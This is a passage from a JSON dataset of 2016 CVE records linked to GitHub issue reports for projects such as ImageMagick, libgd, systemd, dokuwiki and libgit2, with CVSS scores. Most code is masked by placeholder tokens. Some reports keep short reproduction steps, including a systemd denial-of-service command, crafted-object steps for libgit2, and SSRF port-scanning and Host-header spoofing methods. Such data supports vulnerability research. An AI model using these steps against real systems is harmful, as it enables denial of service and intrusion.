  3250. "exploitabilityScore": 2.8
  3251. },
  3252. {
  3253. "CVE_ID": "CVE-2016-7530",
  3254. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/110",
  3255. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/110",
  3256. "Repo_new": "imagemagick/imagemagick",
  3257. "Issue_Created_At": "2016-01-28T12:57:17Z",
  3258. "description": "SIGFPE, Arithmetic exception in APITAG CVETAG",
  3259. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3260. "severity": "MEDIUM",
  3261. "baseScore": 6.5,
  3262. "impactScore": 3.6,
  3263. "exploitabilityScore": 2.8
  3264. },
  3265. {
  3266. "CVE_ID": "CVE-2016-7530",
  3267. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/105",
  3268. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/105",
  3269. "Repo_new": "imagemagick/imagemagick",
  3270. "Issue_Created_At": "2016-01-28T12:56:26Z",
  3271. "description": "out of bounds write in PATHTAG CVETAG",
  3272. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3273. "severity": "MEDIUM",
  3274. "baseScore": 6.5,
  3275. "impactScore": 3.6,
  3276. "exploitabilityScore": 2.8
  3277. },
  3278. {
  3279. "CVE_ID": "CVE-2016-7531",
  3280. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/107",
  3281. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/107",
  3282. "Repo_new": "imagemagick/imagemagick",
  3283. "Issue_Created_At": "2016-01-28T12:56:46Z",
  3284. "description": "out of bounds write in APITAG CVETAG",
  3285. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3286. "severity": "MEDIUM",
  3287. "baseScore": 6.5,
  3288. "impactScore": 3.6,
  3289. "exploitabilityScore": 2.8
  3290. },
  3291. {
  3292. "CVE_ID": "CVE-2016-7532",
  3293. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/109",
  3294. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/109",
  3295. "Repo_new": "imagemagick/imagemagick",
  3296. "Issue_Created_At": "2016-01-28T12:57:05Z",
  3297. "description": "out of bounds read in APITAG CVETAG",
  3298. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3299. "severity": "MEDIUM",
  3300. "baseScore": 6.5,
  3301. "impactScore": 3.6,
  3302. "exploitabilityScore": 2.8
  3303. },
  3304. {
  3305. "CVE_ID": "CVE-2016-7533",
  3306. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/120",
  3307. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/120",
  3308. "Repo_new": "imagemagick/imagemagick",
  3309. "Issue_Created_At": "2016-02-05T00:51:56Z",
  3310. "description": "out of bounds read in APITAG CVETAG",
  3311. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3312. "severity": "MEDIUM",
  3313. "baseScore": 6.5,
  3314. "impactScore": 3.6,
  3315. "exploitabilityScore": 2.8
  3316. },
  3317. {
  3318. "CVE_ID": "CVE-2016-7534",
  3319. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/126",
  3320. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/126",
  3321. "Repo_new": "imagemagick/imagemagick",
  3322. "Issue_Created_At": "2016-02-07T05:52:38Z",
  3323. "description": "out of bounds write in PATHTAG CVETAG",
  3324. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3325. "severity": "MEDIUM",
  3326. "baseScore": 6.5,
  3327. "impactScore": 3.6,
  3328. "exploitabilityScore": 2.8
  3329. },
  3330. {
  3331. "CVE_ID": "CVE-2016-7535",
  3332. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/128",
  3333. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/128",
  3334. "Repo_new": "imagemagick/imagemagick",
  3335. "Issue_Created_At": "2016-02-12T22:30:21Z",
  3336. "description": "out of bounds write in APITAG CVETAG",
  3337. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3338. "severity": "MEDIUM",
  3339. "baseScore": 6.5,
  3340. "impactScore": 3.6,
  3341. "exploitabilityScore": 2.8
  3342. },
  3343. {
  3344. "CVE_ID": "CVE-2016-7536",
  3345. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/130",
  3346. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/130",
  3347. "Repo_new": "imagemagick/imagemagick",
  3348. "Issue_Created_At": "2016-02-14T01:24:01Z",
  3349. "description": "SEGV in PATHTAG CVETAG",
  3350. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3351. "severity": "MEDIUM",
  3352. "baseScore": 6.5,
  3353. "impactScore": 3.6,
  3354. "exploitabilityScore": 2.8
  3355. },
  3356. {
  3357. "CVE_ID": "CVE-2016-7537",
  3358. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/143",
  3359. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/143",
  3360. "Repo_new": "imagemagick/imagemagick",
  3361. "Issue_Created_At": "2016-03-04T21:29:58Z",
  3362. "description": "out of bounds read in APITAG CVETAG",
  3363. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3364. "severity": "MEDIUM",
  3365. "baseScore": 6.5,
  3366. "impactScore": 3.6,
  3367. "exploitabilityScore": 2.8
  3368. },
  3369. {
  3370. "CVE_ID": "CVE-2016-7538",
  3371. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/148",
  3372. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/148",
  3373. "Repo_new": "imagemagick/imagemagick",
  3374. "Issue_Created_At": "2016-03-11T20:48:22Z",
  3375. "description": "out of bounds write in APITAG . CVETAG",
  3376. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3377. "severity": "MEDIUM",
  3378. "baseScore": 6.5,
  3379. "impactScore": 3.6,
  3380. "exploitabilityScore": 2.8
  3381. },
  3382. {
  3383. "CVE_ID": "CVE-2016-7544",
  3384. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/302",
  3385. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/302",
  3386. "Repo_new": "weidai11/cryptopp",
  3387. "Issue_Created_At": "2016-09-23T01:16:51Z",
  3388. "description": "AES and incorrect argument to APITAG under Microsoft compilers. John Byrd reported a crash in AES under Microsoft compilers due to use of APITAG , APITAG and APITAG . APITAG and APITAG are Microsoft SDLC functions ( alloca is on Microsoft's SDLC banned function list URLTAG . Microsoft sometimes uses the heap rather than the stack for APITAG , and that's the reason APITAG is needed. The bug is specific to Windows and Microsoft compilers. The bug does not affect Unix and Linux; and does not affect non Microsoft compilers, like ICC and Borland. The bug was introduced at Commit NUMBERTAG bc NUMBERTAG da NUMBERTAG a3 URLTAG and only affects Crypto NUMBERTAG The code in question asks APITAG for a block of memory. The also over commits the size and adjust the pointer to a NUMBERTAG byte boundary. The pointer is sent APITAG to flush cache lines. If APITAG cannot perform the flush, then it returns false. Upon the false return, the code in reallocates, ajusts the pinter and calls APITAG again. Eventually the call succeeds. After the code in question completes, it frees the adjusted pointer and not the original pointer using APITAG .",
  3389. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  3390. "severity": "HIGH",
  3391. "baseScore": 7.5,
  3392. "impactScore": 3.6,
  3393. "exploitabilityScore": 3.9
  3394. },
  3395. {
  3396. "CVE_ID": "CVE-2016-7568",
  3397. "Issue_Url_old": "https://github.com/libgd/libgd/issues/308",
  3398. "Issue_Url_new": "https://github.com/libgd/libgd/issues/308",
  3399. "Repo_new": "libgd/libgd",
  3400. "Issue_Created_At": "2016-09-21T10:44:14Z",
  3401. "description": "Integer Overflow in APITAG of gd_webp.c. DESCRIPTION ============== An integer overflow issue was found in function APITAG of file gd_webp.c which could lead to heap buffer overflow . CREDIT ============== This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB . VULNERABILITY DETAILS ============== The bad code lies in function APITAG of file gd_webp.c . APITAG There is no overflow check before calling the APITAG function. Actually, an integer overflow can be happened here. For example NUMBERTAG Overflow NUMBERTAG The buffer will be overflowed in the following for loop. CODETAG POC ============== This issue was reported to PHP originally. So currently the proof of concept file is only available for PHP. But I think it's not hard to write a APITAG for libgd. CODETAG EXCEPTION LOG ============== Also, the exception log was generated by PHP. ERRORTAG PATCH ============== It's very easy to write a patch for this issue. Just call function overflow2 to check if overflow exists or not before calling function APITAG . APITAG TIMELINE ============== PATHTAG Report to PHP as BUG NUMBERTAG CVETAG PATHTAG Wrote a patch and created a pull request URLTAG for libgd PATHTAG Wrote a patch and created a pull request URLTAG for php src PATHTAG Fixed in PHP via NUMBERTAG df NUMBERTAG URLTAG and c NUMBERTAG e URLTAG PATHTAG Fixed in libgd via NUMBERTAG bec0f URLTAG",
  3402. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  3403. "severity": "CRITICAL",
  3404. "baseScore": 9.8,
  3405. "impactScore": 5.9,
  3406. "exploitabilityScore": 3.9
  3407. },
  3408. {
  3409. "CVE_ID": "CVE-2016-7569",
  3410. "Issue_Url_old": "https://github.com/appc/docker2aci/issues/201",
  3411. "Issue_Url_new": "https://github.com/appc/docker2aci/issues/201",
  3412. "Repo_new": "appc/docker2aci",
  3413. "Issue_Created_At": "2016-09-27T15:27:16Z",
  3414. "description": "Path traversals present in image converting. Description > in code reviewing, i found a path traversal vulnerability in docker's image converting using docker2aci, there must be a possibility that it extracts embedded layer data to arbitrary directories or paths since no essential check for file path, RCE or privilege escalation would be performed. > it is indeed true that i tested the issue by building a malicious image, if running as root, arbitrary file could be written into arbitrary paths, like backdoors, or running as unprivileged user, arbitrary files also could be extracted to some paths within the capabilities of current user. > It is quite critical, right ? Could you request a CVE for that ?",
  3415. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  3416. "severity": "MEDIUM",
  3417. "baseScore": 5.5,
  3418. "impactScore": 3.6,
  3419. "exploitabilityScore": 1.8
  3420. },
  3421. {
  3422. "CVE_ID": "CVE-2016-7793",
  3423. "Issue_Url_old": "https://github.com/sociomantic-tsunami/git-hub/issues/197",
  3424. "Issue_Url_new": "https://github.com/sociomantic-tsunami/git-hub/issues/197",
  3425. "Repo_new": "sociomantic-tsunami/git-hub",
  3426. "Issue_Created_At": "2016-09-06T20:42:18Z",
  3427. "description": "Missing sanitization of data received from APITAG git hub trusts data received from APITAG and passes it unsanitized to the git command. Malicious APITAG operators could exploit this to execute arbitrary code. For example, if APITAG reported the repository name as APITAG and the repository URL as APITAG then this would happen: ERRORTAG With Python before NUMBERTAG which didn't verify certificates by default, this bug could be also exploited by man in the middle attackers.",
  3428. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  3429. "severity": "HIGH",
  3430. "baseScore": 8.8,
  3431. "impactScore": 5.9,
  3432. "exploitabilityScore": 2.8
  3433. },
  3434. {
  3435. "CVE_ID": "CVE-2016-7795",
  3436. "Issue_Url_old": "https://github.com/systemd/systemd/issues/4234",
  3437. "Issue_Url_new": "https://github.com/systemd/systemd/issues/4234",
  3438. "Repo_new": "systemd/systemd",
  3439. "Issue_Created_At": "2016-09-28T19:14:07Z",
  3440. "description": "Assertion failure when PID NUMBERTAG receives a zero length message over notify socket. systemd fails an assertion in manager_invoke_notify_message URLTAG when a zero length message is received over PATHTAG This allows a local user to perform a denial of service attack against PID NUMBERTAG Proof of concept: PATHTAG systemd notify \"\"",
  3441. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  3442. "severity": "MEDIUM",
  3443. "baseScore": 5.5,
  3444. "impactScore": 3.6,
  3445. "exploitabilityScore": 1.8
  3446. },
  3447. {
  3448. "CVE_ID": "CVE-2016-7798",
  3449. "Issue_Url_old": "https://github.com/ruby/openssl/issues/49",
  3450. "Issue_Url_new": "https://github.com/ruby/openssl/issues/49",
  3451. "Repo_new": "ruby/openssl",
  3452. "Issue_Created_At": "2016-03-27T15:13:53Z",
  3453. "description": "Possible bug: order of setting key vs. IV affects encryption with AES GCM. Hello, I think I may have found a possible bug in the ruby openssl code for encryption. If initialization vector is set _before_ setting the encryption key when using one of the APITAG algorithms, the encryption does not take the IV into account at all and two different IVs (with the same key) produce the same encrypted ciphertext. If IV is set _after_ the key, everything behaves perfectly OK. This issue does not affect other algorithms, only the AES GCM ones. APITAG more context about how I came to this conclusion, please see this stack overflow question URLTAG and this pull request URLTAG in the encryptor gem._ Let me first show a simple test in ruby, to prove this issue: CODETAG When you run this test file, you'll get these results: CODETAG The critical lines are lines NUMBERTAG and NUMBERTAG They show that when the IV is set before the encryption key, the IV is not taken into account. Lines NUMBERTAG show that it this behavior is not present in the CBC encryption mode. I tried to do further tests and they suggest that this behavior is caused by the pre initialization of the encryption key in APITAG URLTAG . In the following test, I tried to closely mimic the C calls that ruby openssl makes when doing a very simple encryption task: ERRORTAG The test tries to encrypt the same data as in the ruby test above, with IV set before / after the key and with or without the pre initialization of the key. Compiling and running the test reveals the following: CODETAG The test shows that when the key pre initialization (i.e. setting the key to all zeroes when configuring the cipher) is skipped, the IV, even if set before the encryption key, is correctly taken into account. On the other hand, when the pre initialization takes place, the IV must be set after the key for the data to be encrypted correctly. I have not experienced any seg faults when not preinitializing the key (a warning about this is present in the comment above the preinitialization code). I compiled and tested the code above against master branch of openssl URLTAG as well as APITAG with the same results. Overall, this behavior seems to me like a bug. Nowhere in the ruby openssl documentation I have found any mention about the order of setting IV vs key being relevant for the encryption process . I believe this should perhaps be more explicitly documented, because accidental setting IVs before keys with GCM algorithms would lead to a severe weakening of the whole encryption , without the user being warned in any way. What do you think? Let me know if you need further info and thanks!",
  3454. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  3455. "severity": "HIGH",
  3456. "baseScore": 7.5,
  3457. "impactScore": 3.6,
  3458. "exploitabilityScore": 3.9
  3459. },
  3460. {
  3461. "CVE_ID": "CVE-2016-7799",
  3462. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/280",
  3463. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/280",
  3464. "Repo_new": "imagemagick/imagemagick",
  3465. "Issue_Created_At": "2016-09-30T10:18:19Z",
  3466. "description": "imagemagick mogrify global buffer overflow. Hi, the following test case will reproduce this crash. It's attached, you need a ASAN build on master branch > \u279c utilities git:(master) \u2717 ./magick mogrify PATHTAG > APITAG NUMBERTAG ERROR: APITAG global buffer overflow on address NUMBERTAG a NUMBERTAG fc at pc NUMBERTAG c9ba bp NUMBERTAG ffdffbaac NUMBERTAG sp NUMBERTAG ffdffbaac NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a NUMBERTAG fc thread T NUMBERTAG c9b9 ( PATHTAG NUMBERTAG f ( PATHTAG NUMBERTAG bed NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff1c7f ( PATHTAG NUMBERTAG f8cead ( PATHTAG NUMBERTAG f5da9 ( PATHTAG NUMBERTAG f NUMBERTAG a6b NUMBERTAG f ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG a NUMBERTAG fc is located NUMBERTAG bytes to the left of global variable 'format_bytes' defined in APITAG NUMBERTAG a NUMBERTAG of size NUMBERTAG a NUMBERTAG fc is located NUMBERTAG bytes to the right of global variable '<string literal>' defined in APITAG NUMBERTAG a NUMBERTAG c0) of size NUMBERTAG string literal>' is ascii string APITAG > SUMMARY: APITAG global buffer overflow ( PATHTAG ) > Shadow bytes around the buggy address NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f NUMBERTAG ece NUMBERTAG f9 f9 f9 f NUMBERTAG f9 f9 f9 f9 f NUMBERTAG ece NUMBERTAG f9 f9 f9 f9 f9 f NUMBERTAG f9 f9 f9 FILETAG",
  3467. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3468. "severity": "MEDIUM",
  3469. "baseScore": 6.5,
  3470. "impactScore": 3.6,
  3471. "exploitabilityScore": 2.8
  3472. },
  3473. {
  3474. "CVE_ID": "CVE-2016-7835",
  3475. "Issue_Url_old": "https://github.com/h2o/h2o/issues/1144",
  3476. "Issue_Url_new": "https://github.com/h2o/h2o/issues/1144",
  3477. "Repo_new": "h2o/h2o",
  3478. "Issue_Created_At": "2016-12-20T06:16:27Z",
  3479. "description": "_.",
  3480. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  3481. "severity": "CRITICAL",
  3482. "baseScore": 9.1,
  3483. "impactScore": 5.2,
  3484. "exploitabilityScore": 3.9
  3485. },
  3486. {
  3487. "CVE_ID": "CVE-2016-7906",
  3488. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/281",
  3489. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/281",
  3490. "Repo_new": "imagemagick/imagemagick",
  3491. "Issue_Created_At": "2016-09-30T10:20:54Z",
  3492. "description": "imagemagick mogrify heap use after free. Hi, the following test case will reproduce this crash. It's attached, you need a ASAN build on master branch > \u279c utilities git:(master) \u2717 ./magick mogrify PATHTAG > APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG c NUMBERTAG at pc NUMBERTAG cfeba bp NUMBERTAG ffdebb9ff NUMBERTAG sp NUMBERTAG ffdebb9ff NUMBERTAG READ of size NUMBERTAG at NUMBERTAG c NUMBERTAG thread T NUMBERTAG cfeb9 ( PATHTAG NUMBERTAG cf ( PATHTAG NUMBERTAG bfcfc ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG ff1c7f ( PATHTAG NUMBERTAG f8cead ( PATHTAG NUMBERTAG f5da9 ( PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG e NUMBERTAG f ( PATHTAG NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region FILETAG",
  3493. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3494. "severity": "MEDIUM",
  3495. "baseScore": 5.5,
  3496. "impactScore": 3.6,
  3497. "exploitabilityScore": 1.8
  3498. },
  3499. {
  3500. "CVE_ID": "CVE-2016-7954",
  3501. "Issue_Url_old": "https://github.com/bundler/bundler/issues/5062",
  3502. "Issue_Url_new": "https://github.com/rubygems/rubygems/issues/3374",
  3503. "Repo_new": "rubygems/rubygems",
  3504. "Issue_Created_At": "2016-10-06T22:07:52Z",
  3505. "description": "Clarify documentation around global sources. As demonstrated by this blog post URLTAG , there is still a lot of end user confusion about how to deal with the source issues originally revealed in URLTAG A lot of that confusion is likely our fault as a team\u2014we often weren't sure what was and wasn't possible even as we were trying to fix the problem. As the above linked blog post mentions, the only way to be NUMBERTAG safe in Bundler NUMBERTAG is to have no global sources. The cross source confusion is eliminated in the (as yet unreleased) Bundler NUMBERTAG series by a series of backwards compatibility breaking changes to the format of the APITAG file and the way that Bundler handles gem sources internally. Once Bundler NUMBERTAG is out, you'll be able to use one global source and additional non global sources without worrying about any name conflicts. As a result of these problems, let's try to make it clearer for users what they need to do: FILETAG with clearer instructions around the possible problem and ways to avoid it ] Update the discussion of multiple sources in the Bundler docs to point out that this opens the possibility of name conflicts, and suggest using no global sources in Bundler NUMBERTAG Gemfiles. [ ] Update the existing warnings as needed to reflect the problems discussed in [the new blog post URLTAG This is a good chance for anyone to contribute, even if they aren't familiar with the Bundler code, since the explanations and warnings have all already been written down at least once. \ud83d\udc4d",
  3506. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  3507. "severity": "CRITICAL",
  3508. "baseScore": 9.8,
  3509. "impactScore": 5.9,
  3510. "exploitabilityScore": 3.9
  3511. },
  3512. {
  3513. "CVE_ID": "CVE-2016-7954",
  3514. "Issue_Url_old": "https://github.com/bundler/bundler/issues/5051",
  3515. "Issue_Url_new": "https://github.com/rubygems/bundler/issues/5051",
  3516. "Repo_new": "rubygems/bundler",
  3517. "Issue_Created_At": "2016-10-05T02:08:29Z",
  3518. "description": "CVETAG secondary sources. Hi, I'm just wondering where the code is at re this vulnerability? Is there a fix? URLTAG Apologies if I missed the answer to this q elsewhere. Thanks, ben",
  3519. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  3520. "severity": "CRITICAL",
  3521. "baseScore": 9.8,
  3522. "impactScore": 5.9,
  3523. "exploitabilityScore": 3.9
  3524. },
  3525. {
  3526. "CVE_ID": "CVE-2016-7964",
  3527. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/1708",
  3528. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/1708",
  3529. "Repo_new": "dokuwiki/dokuwiki",
  3530. "Issue_Created_At": "2016-10-03T16:13:46Z",
  3531. "description": "SSRF vulnerability in Dokuwiki. Hi, I found a ssrf vulnerability in dokuwiki. The APITAG method in APITAG Class(In file: APITAG has no restrict to access private network, such as NUMBERTAG APITAG APITAG This allows user to scan port of internal network. For example NUMBERTAG edit any page in dokuwiki NUMBERTAG Input APITAG NUMBERTAG Hit preview And the server will send a request to APITAG we can detect the port is open or not according to the response time. Hongkun Zeng hongkun. EMAILTAG .cn",
  3532. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
  3533. "severity": "HIGH",
  3534. "baseScore": 8.6,
  3535. "impactScore": 4.0,
  3536. "exploitabilityScore": 3.9
  3537. },
  3538. {
  3539. "CVE_ID": "CVE-2016-7965",
  3540. "Issue_Url_old": "https://github.com/splitbrain/dokuwiki/issues/1709",
  3541. "Issue_Url_new": "https://github.com/dokuwiki/dokuwiki/issues/1709",
  3542. "Repo_new": "dokuwiki/dokuwiki",
  3543. "Issue_Created_At": "2016-10-03T16:14:43Z",
  3544. "description": "Password Reset Address Spoof Vulnerability in APITAG Hi, This is the another vulnerability i found in APITAG APITAG use $_SERVER[HTTP_HOST] to be a part of the password reset address. This can lead to phishing attacks because of the modification of the site's links. (A remote unauthenticated attacker can chenge the host in reset password address.) The vulnerability can be triggered only if the Host header is not part of the web server routing process (e.g. if several domains are served by the same web server). Vulnerable file FILETAG , and the APITAG method use $_SERVER[HTTP_HOST] to be a part of the URL. Solution: Use the variable $_SERVER[SERVER_NAME] instead of the variable $_SERVER[HTTP_HOST] given that the server name is correctly defined or use an application specific constant. Hongkun Zeng hongkun. EMAILTAG .cn",
  3545. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  3546. "severity": "MEDIUM",
  3547. "baseScore": 6.5,
  3548. "impactScore": 3.6,
  3549. "exploitabilityScore": 2.8
  3550. },
  3551. {
  3552. "CVE_ID": "CVE-2016-8568",
  3553. "Issue_Url_old": "https://github.com/libgit2/libgit2/issues/3936",
  3554. "Issue_Url_new": "https://github.com/libgit2/libgit2/issues/3936",
  3555. "Repo_new": "libgit2/libgit2",
  3556. "Issue_Created_At": "2016-09-25T20:41:14Z",
  3557. "description": "Read out of bounds in git_oid_nfmt. Hi, We found a read out of bounds parsing a malformed object file using the last version of libgit2. To reproduce, first compile libgit2 and its examples with APITAG support. Then: $ git init ; mkdir p PATHTAG ; printf APITAG | base NUMBERTAG d > PATHTAG Finally, you can trigger the bug using cat file: $ ASAN_OPTIONS='detect_leaks NUMBERTAG cat file p APITAG The APITAG report is here: ERRORTAG This issues was found using APITAG Regards,",
  3558. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3559. "severity": "MEDIUM",
  3560. "baseScore": 5.5,
  3561. "impactScore": 3.6,
  3562. "exploitabilityScore": 1.8
  3563. },
  3564. {
  3565. "CVE_ID": "CVE-2016-8569",
  3566. "Issue_Url_old": "https://github.com/libgit2/libgit2/issues/3937",
  3567. "Issue_Url_new": "https://github.com/libgit2/libgit2/issues/3937",
  3568. "Repo_new": "libgit2/libgit2",
  3569. "Issue_Created_At": "2016-09-26T01:19:42Z",
  3570. "description": "APITAG using a null pointer derreference in git_commit_message. Hi, We found a null pointer derreference showing a malformed object file using the last version of libgit2. To reproduce, first compile libgit2 and its examples with APITAG support. Then: $ git init ; mkdir p PATHTAG ; printf PATHTAG | base NUMBERTAG d > PATHTAG Finally, you can trigger the bug using cat file: $ ASAN_OPTIONS='detect_leaks NUMBERTAG cat file p APITAG The APITAG report is here: ERRORTAG This issues was found using APITAG Regards",
  3571. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  3572. "severity": "MEDIUM",
  3573. "baseScore": 5.5,
  3574. "impactScore": 3.6,
  3575. "exploitabilityScore": 1.8
  3576. },
  3577. {
  3578. "CVE_ID": "CVE-2016-8579",
  3579. "Issue_Url_old": "https://github.com/appc/docker2aci/issues/203",
  3580. "Issue_Url_new": "https://github.com/appc/docker2aci/issues/203",
  3581. "Repo_new": "appc/docker2aci",
  3582. "Issue_Created_At": "2016-09-30T12:40:33Z",
  3583. "description": "Infinite loop vulnerability in retrieving images chain. > Hi, > In code reviewing, i found an infinite loop vulnerability in retrieving images chain using docker2aci, it occurs during the corresponding json file parsing from user's image archive, fetching the parent image ID until ID is nil. There must be a possibility that the images chain may be a closed cycle, thus , docker2aci will fall into an infinite loop, that's indeed true by some interesting tests. > I think the core cause of this issue is lacking in essential check for duplicated image ID, such as the current image ID could not be equal to its parent image ID, most important, check whether the images chain is a closed cycle. > I processed some interesting test for this issue, building a crafted image whose top layer's parent ID points to itself, then an infinite loop occurred, this flaw caused excessive CPU cycles & resources consume on the host. > expecting subsequent discuss and fix the issue together, and could you request a CVE identifier for that ?",
  3584. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  3585. "severity": "MEDIUM",
  3586. "baseScore": 4.0,
  3587. "impactScore": 1.4,
  3588. "exploitabilityScore": 2.5
  3589. },
  3590. {
  3591. "CVE_ID": "CVE-2016-8600",
  3592. "Issue_Url_old": "https://github.com/dotCMS/core/issues/9330",
  3593. "Issue_Url_new": "https://github.com/dotcms/core/issues/9330",
  3594. "Repo_new": "dotcms/core",
  3595. "Issue_Created_At": "2016-07-06T19:49:07Z",
  3596. "description": "Captcha can be programmatically reused by passing session id. If you use a captcha protected resource like the APITAG you can pass the same captcha again and again via curl if you use the session id cookie of the original request. Once the captcha has been checked and validated, we need to remove it from the user's session programmatically.",
  3597. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  3598. "severity": "HIGH",
  3599. "baseScore": 7.5,
  3600. "impactScore": 3.6,
  3601. "exploitabilityScore": 3.9
  3602. },
  3603. {
  3604. "CVE_ID": "CVE-2016-8614",
  3605. "Issue_Url_old": "https://github.com/ansible/ansible-modules-core/issues/5237",
  3606. "Issue_Url_new": "https://github.com/ansible/ansible-modules-core/issues/5237",
  3607. "Repo_new": "ansible/ansible-modules-core",
  3608. "Issue_Created_At": "2016-10-12T13:54:58Z",
  3609. "description": "security] apt_key module does not verify key fingerprints. ISSUE TYPE Bug Report COMPONENT NAME apt_key module ANSIBLE VERSION devel CONFIGURATION not relevant OS / ENVIRONMENT not relevant SUMMARY apt_key module does not verify key fingerprints and imports keys based on NUMBERTAG digits long id. This is a serious problem because it is easy to generate a APITAG key with a desired NUMBERTAG digit key IDs. Also, hkp is unauthenticated so it it becomes trivial to offer a wrong key to a victim. The problem is [this workaround URLTAG . STEPS TO REPRODUCE yaml name: Try to import key without verifying that we import the correct key hosts: APITAG become: True tasks: apt_key: id: APITAG keyserver: 'hkp://pool.sks APITAG EXPECTED RESULTS That key does not exist. No key is added. ACTUAL RESULTS The key id NUMBERTAG BC NUMBERTAG B is imported. EXAMPLE FIX Enforce correct key fingerprint with a trick such as: CODETAG",
  3610. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  3611. "severity": "HIGH",
  3612. "baseScore": 7.5,
  3613. "impactScore": 3.6,
  3614. "exploitabilityScore": 3.9
  3615. },
  3616. {
  3617. "CVE_ID": "CVE-2016-8654",
  3618. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/94",
  3619. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/94",
  3620. "Repo_new": "jasper-software/jasper",
  3621. "Issue_Created_At": "2016-11-25T18:06:13Z",
